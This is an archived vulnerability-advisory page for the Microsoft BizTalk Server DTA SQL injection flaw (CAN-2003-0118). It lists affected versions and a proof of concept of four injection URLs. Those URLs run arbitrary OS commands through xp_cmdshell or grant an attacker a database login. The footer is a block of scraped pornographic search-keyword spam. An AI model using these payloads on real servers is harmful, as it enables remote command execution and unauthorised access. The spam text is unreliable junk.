exploits , vulnerabilities , articles , Microsoft BizTalk Server DTA Interface SQL Injection Vulnerability
| Title |
Microsoft BizTalk Server DTA Interface SQL Injection Vulnerability |
| Published |
2003-04-30-12:00AM |
| Updated |
2003-05-05-09:16PM |
| Class |
Input Validation Error |
| CVE |
CAN-2003-0118 |
| Remote |
Yes |
| Local |
No |
| Credit |
Discovery credited to Cesar Cerrudo. |
| Vulnerable |
Microsoft BizTalk Server 2002 Enterprise Edition
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Server SP2
Microsoft Windows XP Professional
Microsoft BizTalk Server 2002 Developer Edition
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft BizTalk Server 2000 Standard Edition SP2
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft BizTalk Server 2000 Standard Edition SP1a
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft BizTalk Server 2000 Standard Edition
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft BizTalk Server 2000 Enterprise Edition SP2
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft BizTalk Server 2000 Enterprise Edition SP1a
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft BizTalk Server 2000 Enterprise Edition
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft BizTalk Server 2000 Developer Edition SP2
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft BizTalk Server 2000 Developer Edition SP1a
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft BizTalk Server 2000 Developer Edition
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
|
| Not Vulnerable |
|
| Code |
The following proof of concept was submitted:
http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--
http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--
http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.sp_grantlogin 'domainattacker'--
http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.sp_grantlogin 'domainattacker'--
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Fri, 05 Dec 2008 17:42:58 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.xxx.co Britney se Free xxx w www.goozoo http//puyu www.xxx.co +YaBB+2.2 FRE SEX Kajolxxx.c MODx Sexflim www,98com banjarmasi Saniasexph lindsy loh vbulletin Www.Icar.C Raza nayar sxe-injecd www.hifase internet e Qpop 3.1 www.blackb WWW.TRISHA t928t animal wit watch xxxx quickfap narendra_h http//puyu Hunksrus malayalamf slike Saxy movie n...html/p Ww.sex.mov mobilesex+ malayalamf mambo Remo WWW.INDAIN easyboot5. wwwmaroc s blackwhore modules/ag MODx t441t Xploit wwwmaroc s Kerala sex nhatkivang
|
